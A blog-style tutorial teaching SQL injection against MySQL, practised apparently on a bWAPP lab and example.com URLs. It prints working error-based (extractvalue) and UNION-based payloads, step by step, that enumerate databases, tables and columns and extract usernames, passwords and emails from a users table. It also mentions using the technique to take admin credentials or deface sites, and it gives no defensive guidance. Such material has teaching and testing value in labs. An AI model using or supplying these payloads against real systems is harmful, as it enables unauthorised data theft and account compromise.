SQL Injection

Hello everyone,Let’s learn about sql injection from beginner level to advanced level.Firstly,To learn sql injection a lot of patience is required and a little bit knowledge about SQL language.let’s begin.

SQL Injection: SQL injection is a vulnerability due to error done by many of the programmers.So, basically sql injection is a basic attacking strategy which is used to retrieve the data from the backend database by sending some sql queries to the server (or) we can also say,extracting the unauthorized data by forcing the server to display it.

→Now a days,Many companies considered SQL injection as a critical vulnerability and paying very high bounties.

→Many of the companies are being hacked due to the presence of SQL vulnerability.

→In cyberwars,SQL injection plays a very important role to retrieve the admin credentials or to deface the website.

In this Article,We are going to learn types of sql injections and exploiting them.Basically,SQL injection is used when some input parameters or login forms are present.

For example:If we are searching for some thing like some kind of books in a online store.If we asked for comic books,server will respond with some results that are related to comics.In the backend,some of the SQL queries will be executed to perform this search operation to display the results.So the basic Query will be like this “SELECT * FROM books WHERE book LIKE ‘%comic%’ ”.

So,Now we’ll understand it practically.We want to search a movie but we don’t know it’s name.We know only that movie will start with a letter ‘s’.here is the website..

This is how the url will look like

“http://192.168.43.174/bWAPP/sqli_1.php?title=s&action=search”

So now,we know it is using a GET method to dispaly the movie names those are having ‘s’ letter in their movie names.So,We can assume the backend SQL query may be like this.

“SELECT * FROM movies WHERE titile LIKE ‘%S%’ ”

After the execution of the above query the server will display the results that are taken from the database.So, the attacker will take the advantege of this whole process and inject a malicious SQL query to get the unauthorized data.

Types of SQL Injections:

→Error-Based SQL Injection

→Integer Based SQL Injection

→String Based SQL Injection

→Boolean Based SQL Injection

→Blind SQL Injection

→Time Based SQL Injection

Ok Now let’s perform a simple SQL Injection attacks on each type of SQL injection.

Error-Based SQL Injection:

In error-based SQL injection,as the name suggests Error-Based,Errors are used to extract the data from the database.These types are used when the union operators are filtered.There are many ways to extract the data from the database in error-based.Here is the practical example:

This is our target website and we want to extract the data from this website.First thing,Check the website whether it is vulenrable to SQL injection or not.For that we’ll just add a single quote( ‘ ) at the end of id parameter.

Ok this gave us an error,saying there is an error in syntax and also it’s giving us some information about the backend database.The backend database is MySQL.

By observing the error,it is a double quoted( “ ) type.So,Now we can assume may be the backend query will be like this:

“ SELECT * FROM users WHERE id = “1”

To confirm that let’s add a double quote ( “ ) at the end of the id parameter.

Ok there is no error.So it is confirmed that it is a double quoted.Now let’s comment out everything that is present after where clause.

SELECT * FROM movies WHERE id = “1”- -+-”

Everything after where clause will be commented out.Now our query is fully balanced.Next step is to find out the no. of columns.To find them out we are going to use order clause.

For order by 6,it showed an error saying that unknown column.It means there are five columns in the table.As you can observe i’ve added only a single quote at the end of id parameter to produce an error when the order by statement is false.Now let’s find the vulnerable column.For this we are going to use union operator.But this is error based so it won’t show any output.

As you can see there is no error produced.So,i’m going to explain union based in other types.For now we’ll focus on extractvalue method or XPATH Injection method. In this method we are going to use extractvalue functon to extract the data.

“https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select database())))- -++”

An error is produced But the current database is displayed.Now to enumerate tables that are present in the database we use information_schema.It will be present in every SQL database.

“https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(table_name) from information_schema.tables where table_schema=database())))- -++”

Ok this gives an error saying that there are more than 1 row.That mean there are more than one table present in the database and we have select only one row.To display all the tables that are present in the database we going to LIMIT function to display the tables that are present in the database one-by-one.

“https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(table_name) from information_schema.tables where table_schema=database() LIMIT 0,1)))- -++”

If we increase the value to 1.This will gives us another table that is present in the database.

“https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(table_name) from information_schema.tables where table_schema=database() LIMIT 1,1)))- -++”

Now we’ll use this method and find out the table names that are present in the database.OK,I’ve got a table ‘users’ that are present in current database.Now we have to find the column names that are present in the repesctive table to extract the juicy information.

“https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(column_name) from information_schema.columns where table_name=0x7573657273 LIMIT 0,1)))- -++”

Ok we got a column with name ‘email’ to find out other columns let’s increase the limit value as mentioned before.

Ok After increasing the value i’ve got email,id,username,password,level columns now let’s extract the data from these columns.

“https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email,0x3c62723e,level,0x3c62723e) from users)))- -++”

ok.successfully performed a Error-Based SQL injection.

In Error-Based,if extractvalue won’t work we have to two more methods using updatexml and sub-query.We’ll discuss them in coming articles.

Integer -Based SQL Injection:

In interger based,The id parameter is an interger.If we add a single quote ( ‘ ) or double quote ( “ ) it will show an error. So the query will be like this:

“SELECT * FROM users WHERE id=1 ”

There is no need to add single quote ( ‘ ) or double quote ( “ ) or no need to balance the query.Our next step is to find the no. of columns..For that we are going to use ORDER by operator.

Observe the url,I’ve commented out the remaining query.So we got an error saying Unknown columns.

“SELECT * FROM users WHERE id=1 order by 100- -++”

Ok there is no error.So, there are 5 columns in the table.So now let’s find out the vulnerable columns that are present in the table.For that,we’ll use UNION operator.

Normally to display the vulnerable columns we have to provide a false input.

For example,Here i’ve given the input as 1 and false.So if the id =1 exits it will be true.And now true and true it will be true but in our case i’ve given false .So,true and false will be false.So,this will display the column no. instead of displaying the name.

Now we have a vulnerable column,now we’ll extract the data from the database.

“http://example.com/index.php?id=1 and false union all select 1,group_concat(0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,version(),0x3c62723e),3,4,5 — ++”

So,here is our database,user and the version of the mysql server.So,now let’s find the table names that are present in that database.

“http://example.com/index.php?id=1 and false union all select 1,group_concat(0x3c62723e,table_name,0x3c62723e),3,4,5 from information_schema.tables where table_schema=database() — ++”

And Now we’ll find columns that are present in ‘users’ table.

“http://example.com/index.php?id=1 and false union all select 1,group_concat(0x3c62723e,column_name,0x3c62723e),3,4,5 from information_schema.columns where table_name=0x7573657273 — ++”

Now we have column names Now we’ll try to extract the sensitive information from the database.

“http://example.com/index.php?id=1 and false union all select 1,group_concat(0x3c62723e,id,0x3a3a,username,0x3a3a,password,0x3a3a,email,0x3a3a,level,0x3c62723e),3,4,5 from users — ++”

OK,we’ve got the username and password,email …:) done with integer.

String-Based SQL Injection:

Now let’s focus on string based.Now, in string based the id parameter is placed in between single quote ( ‘ ) or double quote ( “ ) or in backets ( () )

For example,we have some statements

SELECT * FROM users WHERE id = ‘1’

SELECT * FROM users WHERE id = “1”

SELECT * FROM users WHERE id = (‘1’)

SELECT * FROM users WHERE id = (“1”)

So,in string based we have to balance the query inorder to inject.First let’s find what kind of string it is. like double quoted ( “ )or single quoted ( ‘ )or placed in between brackets

So,Look at the input paramater.saying id = 1 but we don’t know whether it is placed between single quote or double quote .So,To find it out we have to produce an error.

So i’ve added a single quote ( ‘ ) this tells us there is an error “1”’ so this means it is placed in between the double quote.So now let’s balance the query by adding a double quote and commenting out the remaining part.

So now let’s find out the no. of columns

So, we have 5 column.To know why i’ve used single please refer the error based to understand.Now let’s extract the data as i mentioned in integeter based……….

Remaining Boolean Based ,Blind And Time Based will be covered in next article.

Boolean Based is nothing but using true or flase statements to produce errors. Blind Based is also similar but in blind we don’t know anything about the no. of columns ,backend database,database name etc.., In blind we have to depend on the results that are produced by the server.

These will be covered in next Article.

THANK YOU…..:)

Follow For more Stuff Like This….

Instagram:https://www.instagram.com/sampath.pendurthi/

LinkedIN:linkedin.com/in/sampath-pendurthi-1313a3184/

Github:https://github.com/LetMeHackYou/

Happy Hacking …..

PEACE…..✌️✌️